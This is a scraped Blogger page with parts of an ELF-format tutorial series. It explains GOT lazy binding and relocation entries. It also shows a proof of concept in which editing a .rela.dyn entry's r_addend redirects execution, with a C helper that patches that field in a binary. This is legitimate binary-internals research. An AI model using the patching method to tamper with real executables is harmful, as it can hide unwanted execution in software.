After the second breakpoint hit at <span style="font-family: "courier new" , "courier" , monospace;">0x4004a0</span> (<i>which is the setup code for the call to <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve</span></i>) we can clearly see a new entry in the GOT at address <span style="font-family: "courier new" , "courier" , monospace;">0x601020</span>: the update writes the address <span style="font-family: "courier new" , "courier" , monospace;">0x7ffff7a7c690</span>, which the debugger's symbol information identifies as the <span style="font-family: "courier new" , "courier" , monospace;">_IO_puts</span> function! The GOT entry has been correctly updated.<br />
<br />
<i>Okay, that's pretty much it for this post. In later posts I may talk a little about how to abuse this lazy loading mechanism to execute other functions - some cool tricks. For now I thought I'd keep it short, explain only the main concepts here, and leave the advanced sorcery and ELF black magic for future posts. Stay tuned folks!</i></div>
</div>
<div>
<h2 style="text-align: left;">
References and Reading</h2>
Some stuff I read and relied on to make this post. Very useful information here!<br />
<ol style="text-align: left;">
<li><a href="https://docs.oracle.com/cd/E23824_01/html/819-0690/chapter3-7.html">https://docs.oracle.com/cd/E23824_01/html/819-0690/chapter3-7.html</a></li>
<li><a href="https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf">https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf </a></li>
<li><a href="https://www.dabeaz.com/papers/CiSE/c5090.pdf">https://www.dabeaz.com/papers/CiSE/c5090.pdf</a> </li>
<li><a href="https://www.bottomupcs.com/dynamic_linker.xhtml">https://www.bottomupcs.com/dynamic_linker.xhtml</a></li>
<li><a href="http://refspecs.linuxfoundation.org/ELF/zSeries/lzsabi0_zSeries/x2251.html">http://refspecs.linuxfoundation.org/ELF/zSeries/lzsabi0_zSeries/x2251.html</a> </li>
<li><a href="https://www.lurklurk.org/linkers/linkers.html">https://www.lurklurk.org/linkers/linkers.html</a> </li>
<li><a href="https://0x00sec.org/t/linux-internals-the-art-of-symbol-resolution/1488">https://0x00sec.org/t/linux-internals-the-art-of-symbol-resolution/1488</a></li>
<li><a href="https://akkadia.org/drepper/dsohowto.pdf">https://akkadia.org/drepper/dsohowto.pdf</a></li>
<li><a href="https://www.iecc.com/linker/linker10.html">https://www.iecc.com/linker/linker10.html</a></li>
<li><a href="https://github.com/mewrev/dissection">https://github.com/mewrev/dissection</a></li>
<li><a href="https://0x00sec.org/t/linux-internals-dynamic-linking-wizardry/1082">https://0x00sec.org/t/linux-internals-dynamic-linking-wizardry/1082</a></li>
<li><a href="https://grugq.github.io/docs/subversiveld.pdf">https://grugq.github.io/docs/subversiveld.pdf</a></li>
<li><a href="http://phrack.org/issues/61/8.html">http://phrack.org/issues/61/8.html</a> </li>
</ol>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-50735076561445090742018-10-22T18:34:00.000-07:002018-10-22T18:42:42.114-07:00Introduction to the ELF Format (Part VI) : More Relocation tricks - r_addend execution (Part 3)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div>
So I lied a little about what would come next in the series: I realized there was something I should have added to the previous post -<i> which, ironically, was an addendum about the <span style="font-family: "courier new" , "courier" , monospace;">r_addend </span>field :)</i> So here it is: the section on mangling <span style="font-family: "courier new" , "courier" , monospace;">r_addend </span>fields, along with some other tricks I left out.<br />
<h3 style="text-align: left;">
Some things you might need are:</h3>
<ol style="text-align: left;">
<li>The executable code we will dissect; this is the source for never_call.c <a href="https://gist.github.com/k3170makan/c7712b7aa14f1c2e7c0e7ae725f2fac1">https://gist.github.com/k3170makan/c7712b7aa14f1c2e7c0e7ae725f2fac1</a> </li>
<li>binutils </li>
<li>GCC</li>
</ol>
<div>
<i>An average Linux distro will already have these ready to roll, except maybe hexedit/hexdump.</i></div>
</div>
<h2 style="text-align: left;">
Mangling dynamic symbol relocation <span style="font-family: "courier new" , "courier" , monospace;">r_addends</span></h2>
<div>
<div style="text-align: left;">
<i> r_addend you glad it didn't say 0xAAAA...?</i></div>
<div style="text-align: left;">
<br /></div>
<div>
</div>
</div>
<div>
In the previous post, I covered the basics of the relocation entry format, showed how complex entries can become, and showed how one ELF object can have a bunch of different <span style="font-family: "courier new" , "courier" , monospace;">.rela.[name] </span>sections. Those sections hold relocs that are applied at different stages of the ELF's life cycle: some are used for calling functions, while others help the runtime perform initialization. For the first example we are going to focus on the <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span> section and what happens when we are too liberal with the values in the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span>.<br />
<br />
The <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span>, if you weren't aware, is a field in relocation entries that specifies an additional constant operand for the relocation calculation. I also mentioned that this field is not actually used much on the x86_64 platform and, for the most part (<i>as far as I can see</i>), is nulled out. So your binary will have <span style="font-family: "courier new" , "courier" , monospace;">.rela.*</span> sections (<i>'<span style="font-family: "courier new" , "courier" , monospace;">a</span>' meaning with <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span></i>), but most of the time their <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> fields will simply be set to 0.</div>
<div>
<br /></div>
<div>
While poking and prodding these <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> fields in some binaries, I found that you can actually get the runtime to execute from the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> value if you make it non-zero. Here's the proof of concept:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwWXSqI-L9-o7YZipDHVnbN2hbbaP5Xm7qms6R1JTcIu1YmpUHYkJUVeDUCCILCSBLhhtFWqebz06Fd-IUqRdlGaXMtn10iAGbT8b0ENS-GDicMHvv7UOQ6vhMTWX8VvP5TJP1Wdd9z-g/s1600/r_addend+poc+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="1214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwWXSqI-L9-o7YZipDHVnbN2hbbaP5Xm7qms6R1JTcIu1YmpUHYkJUVeDUCCILCSBLhhtFWqebz06Fd-IUqRdlGaXMtn10iAGbT8b0ENS-GDicMHvv7UOQ6vhMTWX8VvP5TJP1Wdd9z-g/s1600/r_addend+poc+%25282%2529.png" /></a></div>
<br /></div>
<div>
<br /></div>
<div>
In this screenshot I am changing the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> of the relocation for <span style="font-family: "courier new" , "courier" , monospace;">__gmon_start__</span>(2), which appears at address <span style="font-family: "courier new" , "courier" , monospace;">0x3B0</span>. <i>It's not so important where it gets called; I am pretty sure it's just after <span style="font-family: "courier new" , "courier" , monospace;">_start </span>and before the <span style="font-family: "courier new" , "courier" , monospace;">main </span>function.</i><br />
<br />
What's good to know here is that, according to the program's own logic, the <span style="font-family: "courier new" , "courier" , monospace;">never_call </span>function should never be called - <i>we can pretty much bet there is no simple logical progression leading to never_call's execution, because the code for this binary only prints two strings and then exits</i>.<br />
<br />
Now, you should check the readelf output as well (<i>in the screenshot</i>); it confirms that we are changing this field correctly. Also notice that we have only edited the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> value of this <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span> entry, meaning the actual symbol value for <span style="font-family: "courier new" , "courier" , monospace;">__gmon_start__</span> is untouched in both the dynamic symbol table (<span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span>) and the full symbol table (<span style="font-family: "courier new" , "courier" , monospace;">.symtab</span>).<br />
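<div>
If you want to script the hexedit step instead of doing it by hand, the arithmetic is simple because every <span style="font-family: "courier new" , "courier" , monospace;">Elf64_Rela</span> entry is 24 bytes (<span style="font-family: "courier new" , "courier" , monospace;">r_offset</span>, <span style="font-family: "courier new" , "courier" , monospace;">r_info</span>, <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span>, 8 bytes each). A minimal sketch, assuming you already know the file offset of <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span> (the Off column of <span style="font-family: "courier new" , "courier" , monospace;">readelf -S</span>) and the index of the entry you want; <span style="font-family: "courier new" , "courier" , monospace;">rela_addend_offset</span> and <span style="font-family: "courier new" , "courier" , monospace;">patch_rela_addend</span> are hypothetical helpers, and the patch assumes a little-endian host, matching x86-64 ELF files.</div>

```c
#include <assert.h>   /* static_assert */
#include <elf.h>      /* Elf64_Rela */
#include <stddef.h>   /* offsetof, size_t */
#include <stdint.h>
#include <string.h>

static_assert(sizeof(Elf64_Rela) == 24, "Elf64_Rela is three 8-byte fields");

/* File offset of the r_addend field of entry `index` in a SHT_RELA section
 * whose data starts at file offset `sh_offset`. */
static uint64_t rela_addend_offset(uint64_t sh_offset, size_t index) {
    return sh_offset + (uint64_t)index * sizeof(Elf64_Rela)
                     + offsetof(Elf64_Rela, r_addend);
}

/* Overwrite that r_addend in an in-memory copy of the file (the hexedit step).
 * Returns -1 if the 8-byte field would fall outside the buffer. */
static int patch_rela_addend(uint8_t *file, size_t file_size,
                             uint64_t sh_offset, size_t index, int64_t addend) {
    uint64_t off = rela_addend_offset(sh_offset, index);
    if (off > file_size || file_size - off < sizeof addend)
        return -1;
    memcpy(file + off, &addend, sizeof addend);   /* little-endian host assumed */
    return 0;
}
```

<div>
For instance, with <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span> at a (made-up) file offset of 0x400, entry 2's <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> lives at 0x400 + 2 * 24 + 16 = 0x440.</div>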
<br />
This really does execute the <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> value straight up. I've confirmed this in several other ways (<i>for instance, the segfault consistently happens with the instruction pointer at this value</i>):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGoQGbkGp42uI4xKyxCQtW-7kQzlbJZLLXascVanjFe1Jynxjr937LhtWyBxuSEBNyFlzwNgXWsCzuyCUF0cthLKyNt362R-kUibVN-v3g8LbJ6gwL-AlCeN7SNLX6LwO0eMfaUKNXUE/s1600/Screenshot+from+2018-10-21+20-10-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="634" data-original-width="1327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGoQGbkGp42uI4xKyxCQtW-7kQzlbJZLLXascVanjFe1Jynxjr937LhtWyBxuSEBNyFlzwNgXWsCzuyCUF0cthLKyNt362R-kUibVN-v3g8LbJ6gwL-AlCeN7SNLX6LwO0eMfaUKNXUE/s1600/Screenshot+from+2018-10-21+20-10-39.png" /></a></div>
<br />
<br />
<i>It goes without saying that I am forcing it to take completely unnatural instruction pointer values like 0xaa..., 0xbb..., etc.</i><br />
<br />
<br /></div>
<div>
This behavior is limited to a few relocation types (<span style="font-family: "courier new" , "courier" , monospace;">r_types</span>). I investigated further which <span style="font-family: "courier new" , "courier" , monospace;">r_types </span>allow for this in some capacity, and I got execution using the following relocation types:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_64 0x01</span> - Direct 64 bit Reloc</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_IRELATIVE 0x25</span> - Adjust indirectly by program base </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">R_X86_64_RELATIVE 0x08</span> - Adjust by program base</li>
</ul>
<br />
<i>I'll go into detail about exactly why these end up getting executed, but it's going to take a little more research before I can confidently talk about that lol.</i><br />
<br />
We know, of course, that the <span style="font-family: "courier new" , "courier" , monospace;">rela </span>sections will appear in the live memory image (they are part of a <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD </span>segment (1)), so they are potentially <i>"referenceable"</i> from inside running code. This means they offer data to target that could potentially affect execution flow. </div>
<div>
<h2 style="text-align: left;">
Footnotes</h2>
</div>
<div>
<ol style="text-align: left;">
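<li>Not directly: it's because the section they appear in is marked ALLOC (<span style="font-family: "courier new" , "courier" , monospace;">SHF_ALLOC</span>), as <i>some</i> would refer to it, which places it inside a loadable segment.</li>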
<li>Which, to cut a long story short, is <i>afaik</i> a profiling function that gets called from <span style="font-family: "courier new" , "courier" , monospace;">_init()</span> during runtime initialization.</li>
</ol>
<h2 style="text-align: left;">
References and Reading</h2>
</div>
<div>
<ul style="text-align: left;">
<li><a href="https://paper.seebug.org/papers/Archive/refs/elf/ELF-berlinsides-0x3.pdf">https://paper.seebug.org/papers/Archive/refs/elf/ELF-berlinsides-0x3.pdf</a></li>
<li><a href="https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf">https://www.cs.ucsb.edu/~chris/research/doc/usenix15_elf.pdf </a></li>
</ul>
</div>
<div>
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:</div>
<div>
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>(Part V) : C Start up <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html</a> </li>
<li>(Part VI) </li>
<ol>
<li>The Symbol Table and Relocations Part 1 <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html</a> </li>
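<li>Symbols and Relocs Part 2 <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi_18.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi_18.html</a></li>
<li>More Relocation tricks - r_addend execution (Part 3): this post</li>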
</ol>
</ol>
<div>
<i>So if these sound like another language to you, try starting a little further up in the chain ;)</i></div>
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-84859626019266764752018-10-18T20:40:00.000-07:002018-10-21T19:01:47.360-07:00Introduction to The ELF Format (Part VI): The Symbol Table and Relocations (Part 2)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:<br />
<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
<li>(Part IV) : Section Types and Special Sections <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-iv.html</a></li>
<li>(Part V) : C Start up <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-v.html</a> </li>
<li>(Part VI) : The Symbol Table and Relocations Part 1 <a href="https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html">https://blog.k3170makan.com/2018/10/introduction-to-elf-format-part-vi.html</a> </li>
<li>this </li>
</ol>
<div>
<br /></div>
<div>
In this post I'm going to explain a little bit more about how Relocations and Symbols work. We talked about the symbol table specifically in the previous post, but didn't do justice to why Relocations are needed and how they are used.</div>
<h2 style="text-align: left;">
Introduction</h2>
<div>
<i>"The real is what resists symbolization absolutely" - Jacques Lacan (1)</i></div>
<div>
<br /></div>
<div>
When a program is compiled and linked, the code and data from each component object end up at some <i>offset </i>away from their original position in the final object. The ELF format records these locations, and a mechanism for resolving them, in Relocation records. Relocation records hold information used by various utilities to find the right place in the ELF file to patch, and the symbol whose definition should be used to patch it. They also allow compilers and C developers to extend the functionality of symbol resolution - <i>with extra hooks and plugins and what have you, so like exploit dev except you actually want to write data to a function pointer lol</i>. So: symbol information, but for symbols themselves!<br />
<br />
Relocations come in a number of types, and each architecture defines and implements its own subset - <i>so many archs will have their own symbol resolution mechanisms applied to the relocation record format discussed here</i>. On top of this already crowded field of definitions, relocation records (<i>referred to as "relocs" from here on out...sometimes</i>) are used for various reasons throughout a program's life cycle. Some relocs are used to prep the runtime, others for plain old dynamic linking and lazy loading, and there are very likely more uses that are defined but not mentioned here.<br />
<br />
Let's take a look at how this Relocation format works and which sections are meant to hold information for it.</div>
<div>
<h2 style="text-align: left;">
The Relocation Table (.rel, .rela.dyn and friends)</h2>
To give an overview of how complex these fields are, here's a small cheat sheet:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0E56blBE3xgH02Qq8LjEj4g574YUu6AkaIDiGH3GPs02IA6iBePsghZeomtISjS4LXCG7gf5dScoy89Bufst9cMvwm3BrLrUs4a-EG97jbBJJGExqRrAqht3L21aZrHMvUj08toQ-Yb4/s1600/relocation_entry_format_cheat_sheet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="637" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0E56blBE3xgH02Qq8LjEj4g574YUu6AkaIDiGH3GPs02IA6iBePsghZeomtISjS4LXCG7gf5dScoy89Bufst9cMvwm3BrLrUs4a-EG97jbBJJGExqRrAqht3L21aZrHMvUj08toQ-Yb4/s1600/relocation_entry_format_cheat_sheet.png" /></a></div>
<br />
<br />
As we know, the section header table can point us at different parts of an ELF file and tell us what they are meant for. Some of the sections it describes are specifically for holding relocation information, and because relocation, as we said, can serve multiple purposes, there are multiple relocation sections. Their names follow the <span style="font-family: "courier new" , "courier" , monospace;">.rela.[name]</span> scheme, where the name says more or less what the relocation entries are for:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">.rel.dyn .rela.dyn </span>- relocation entries for dynamic symbols </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">.rel.plt .rela.plt</span> - relocation entries for the PLT (<i>usually the jump-slot entries that fill in the GOT slots the PLT jumps through</i>)</li>
<li><i>other types exist but I find they are rarely used or hard to find examples for.</i></li>
</ul>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">rela </span>with an "a" at the end indicates that the section's entries carry an addend field. Relocation with addend is the form used on x86_64 (<i>the x86-64 psABI only uses <span style="font-family: "courier new" , "courier" , monospace;">Elf64_Rela</span> entries</i>), although the actual <span style="font-family: "courier new" , "courier" , monospace;">r_addend</span> field is almost always 0 -<i> glibc also maintains some flags to configure whether this field is used as part of the relocation</i>.<br />
<br />
Basically, that means you will see the relocation-with-addend format used, but the actual addend will most likely be set to 0, which makes it effectively a normal reloc with a NULL word at the end of each entry. <i>Potentially useful, depending on how much code trusts that NULL at the end when it loops through records</i>.<br />
<br />
Anyway, seeing that there could be a number of different <span style="font-family: "courier new" , "courier" , monospace;">rela.[name]</span> sections for just about any crazy purpose, I decided to go looking for some weird <span style="font-family: "courier new" , "courier" , monospace;">[name]</span> values. So I scanned my own machine quite liberally for ELF objects and found that few of them use any wilder form of .rel section - <i>compared to the common rel(a).dyn, rel(a).plt</i>:<br />
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmdqtdcr2RrvanOjm_XGcKva6-EBGK5faMx1md4uABIRg5KTZOEA81NoAWDzWN-zV2_YQIYRShsegeGxMV33wmt3swloN2F6JEMdCnaFMZ-U67OXmkHnTMt5t1PRiYJiPvzvGxxWI0kAQ/s1600/interestingplts.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="830" data-original-width="1600" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmdqtdcr2RrvanOjm_XGcKva6-EBGK5faMx1md4uABIRg5KTZOEA81NoAWDzWN-zV2_YQIYRShsegeGxMV33wmt3swloN2F6JEMdCnaFMZ-U67OXmkHnTMt5t1PRiYJiPvzvGxxWI0kAQ/s640/interestingplts.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The .fffff sections are from me doing research for this blog series but I freaked out a little when I saw them at first lol</span></i></td></tr>
</tbody></table>
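<div>
A rough way to reproduce that scan in C is to walk each file's section header table and print the sections whose names start with <span style="font-family: "courier new" , "courier" , monospace;">.rel.</span> or <span style="font-family: "courier new" , "courier" , monospace;">.rela.</span>. The sketch below handles one 64-bit ELF file held in memory; looping it over the files on your machine is left out. <span style="font-family: "courier new" , "courier" , monospace;">load_file</span> and <span style="font-family: "courier new" , "courier" , monospace;">list_rel_sections</span> are hypothetical helpers, and the bounds checking is minimal, so don't point it at untrusted input.</div>

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read a whole file into a malloc'd buffer; returns NULL on failure. */
static unsigned char *load_file(const char *path, size_t *size) {
    FILE *f = fopen(path, "rb");
    unsigned char *buf = NULL;
    long n = 0;
    if (f && fseek(f, 0, SEEK_END) == 0 && (n = ftell(f)) > 0 &&
        fseek(f, 0, SEEK_SET) == 0 && (buf = malloc((size_t)n)) != NULL) {
        if (fread(buf, 1, (size_t)n, f) == (size_t)n) {
            *size = (size_t)n;
        } else {
            free(buf);
            buf = NULL;
        }
    }
    if (f) fclose(f);
    return buf;
}

/* Print sections named .rel.* or .rela.* in a 64-bit ELF image; returns how
 * many were found, or -1 if the buffer doesn't look like a usable ELF64 file. */
static int list_rel_sections(const unsigned char *img, size_t size, FILE *out) {
    if (size < sizeof(Elf64_Ehdr) || memcmp(img, ELFMAG, SELFMAG) != 0 ||
        img[EI_CLASS] != ELFCLASS64)
        return -1;
    const Elf64_Ehdr *eh = (const Elf64_Ehdr *)img;
    if (eh->e_shoff == 0 || eh->e_shstrndx >= eh->e_shnum ||
        eh->e_shoff + (uint64_t)eh->e_shnum * sizeof(Elf64_Shdr) > size)
        return -1;
    const Elf64_Shdr *sh = (const Elf64_Shdr *)(img + eh->e_shoff);
    const char *names = (const char *)(img + sh[eh->e_shstrndx].sh_offset);
    int count = 0;
    for (int i = 0; i < eh->e_shnum; i++) {
        const char *name = names + sh[i].sh_name;
        if (strncmp(name, ".rel.", 5) == 0 || strncmp(name, ".rela.", 6) == 0) {
            fprintf(out, "[%2d] %-24s %s\n", i, name,
                    sh[i].sh_type == SHT_RELA ? "SHT_RELA" :
                    sh[i].sh_type == SHT_REL  ? "SHT_REL"  : "other");
            count++;
        }
    }
    return count;
}
```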
<div>
Moving on, we should probably look at the struct the C runtime and glibc use to handle Relocation records:</div>
(extract from <span style="font-family: "courier new" , "courier" , monospace;">glibc-2.28/elf/elf.h</span>)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcCRiafX58VXHKCvTLgT9a1zZHW16VmG5QouFHWnHdpZMQsU5DwEJIhY08uuw5sdCZy4x-um74eX_FjxYR1ZmjCCIH3ULLYUXoxN8JVwaNhWVKO90AixgCvW5MfAE6DP61isxfCWuYl1A/s1600/Screenshot+from+2018-10-14+13-31-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="654" data-original-width="1213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcCRiafX58VXHKCvTLgT9a1zZHW16VmG5QouFHWnHdpZMQsU5DwEJIhY08uuw5sdCZy4x-um74eX_FjxYR1ZmjCCIH3ULLYUXoxN8JVwaNhWVKO90AixgCvW5MfAE6DP61isxfCWuYl1A/s1600/Screenshot+from+2018-10-14+13-31-13.png" /></a></div>
<br />
<br />
This is what I've gathered each of the fields in the struct are meant for:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">Elf64_Addr (8 bytes wide) r_offset</span> - where the relocation is applied: for executables and shared objects this is the virtual address of the storage unit being patched, and for relocatable objects it is an offset into the section being relocated. <i>I expand on these a little later in this post, but to be fair to them please check out the documentation on this.</i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">Elf64_Xword (8 bytes wide) r_info </span>- a bit field the runtime pulls through some macros to determine the kind of relocation being defined. The field holds typing information for the reloc entry as well as the index of the symbol it refers to. <i>Quite a crucial field, because if you can write to it you can make relocs point to different symbols, which is pretty powerful depending on context.</i></li>
<li><span style="font-family: "courier new" , "courier" , monospace;">Elf64_Sxword (8 bytes wide) r_addend</span> - the addend, a constant included in the calculation of the relocation; pretty much always ignored in the <span style="font-family: "courier new" , "courier" , monospace;">x86_64</span> binaries I'm using.<i> I will explore how true this claim is later on.</i></li>
</ul>
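<div>
To see these three fields in a real file, here is a sketch that walks a <span style="font-family: "courier new" , "courier" , monospace;">SHT_RELA</span> section such as <span style="font-family: "courier new" , "courier" , monospace;">.rela.dyn</span>, decodes each <span style="font-family: "courier new" , "courier" , monospace;">r_info</span> with glibc's <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_SYM</span> / <span style="font-family: "courier new" , "courier" , monospace;">ELF64_R_TYPE</span> macros, and looks symbol names up through the section's <span style="font-family: "courier new" , "courier" , monospace;">sh_link</span> (normally <span style="font-family: "courier new" , "courier" , monospace;">.dynsym</span>). It assumes a well-formed 64-bit ELF file read fully into memory; <span style="font-family: "courier new" , "courier" , monospace;">load_file</span> and <span style="font-family: "courier new" , "courier" , monospace;">dump_rela</span> are hypothetical helpers with minimal bounds checks. The output is roughly what <span style="font-family: "courier new" , "courier" , monospace;">readelf -r</span> prints.</div>

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read a whole file into a malloc'd buffer; returns NULL on failure. */
static unsigned char *load_file(const char *path, size_t *size) {
    FILE *f = fopen(path, "rb");
    unsigned char *buf = NULL;
    long n = 0;
    if (f && fseek(f, 0, SEEK_END) == 0 && (n = ftell(f)) > 0 &&
        fseek(f, 0, SEEK_SET) == 0 && (buf = malloc((size_t)n)) != NULL) {
        if (fread(buf, 1, (size_t)n, f) == (size_t)n) {
            *size = (size_t)n;
        } else {
            free(buf);
            buf = NULL;
        }
    }
    if (f) fclose(f);
    return buf;
}

/* Dump every Elf64_Rela in the section called `secname`. Returns the number
 * of entries, or -1 if the section is missing or is not SHT_RELA. */
static long dump_rela(const unsigned char *img, size_t size,
                      const char *secname, FILE *out) {
    if (size < sizeof(Elf64_Ehdr) || memcmp(img, ELFMAG, SELFMAG) != 0 ||
        img[EI_CLASS] != ELFCLASS64)
        return -1;
    const Elf64_Ehdr *eh = (const Elf64_Ehdr *)img;
    const Elf64_Shdr *sh = (const Elf64_Shdr *)(img + eh->e_shoff);
    const char *shnames = (const char *)(img + sh[eh->e_shstrndx].sh_offset);

    for (int i = 0; i < eh->e_shnum; i++) {
        if (strcmp(shnames + sh[i].sh_name, secname) != 0)
            continue;
        if (sh[i].sh_type != SHT_RELA || sh[i].sh_entsize != sizeof(Elf64_Rela))
            return -1;
        const Elf64_Rela *rel = (const Elf64_Rela *)(img + sh[i].sh_offset);
        const Elf64_Shdr *symsec = &sh[sh[i].sh_link];     /* usually .dynsym */
        const Elf64_Sym *syms = (const Elf64_Sym *)(img + symsec->sh_offset);
        const char *strtab = (const char *)(img + sh[symsec->sh_link].sh_offset);
        long n = (long)(sh[i].sh_size / sizeof(Elf64_Rela));
        for (long k = 0; k < n; k++) {
            uint64_t sym  = ELF64_R_SYM(rel[k].r_info);    /* high 32 bits */
            uint64_t type = ELF64_R_TYPE(rel[k].r_info);   /* low 32 bits */
            fprintf(out, "r_offset=%#010lx type=%2lu sym=%3lu %-24s r_addend=%ld\n",
                    (unsigned long)rel[k].r_offset, (unsigned long)type,
                    (unsigned long)sym, sym != 0 ? strtab + syms[sym].st_name : "",
                    (long)rel[k].r_addend);
        }
        return n;
    }
    return -1;
}
```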
<div>
To expand on how the <span style="font-family: "courier new" , "courier" , monospace;">r_info</span> field is used for determining type information for the reloc, here's an annotated screenshot:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
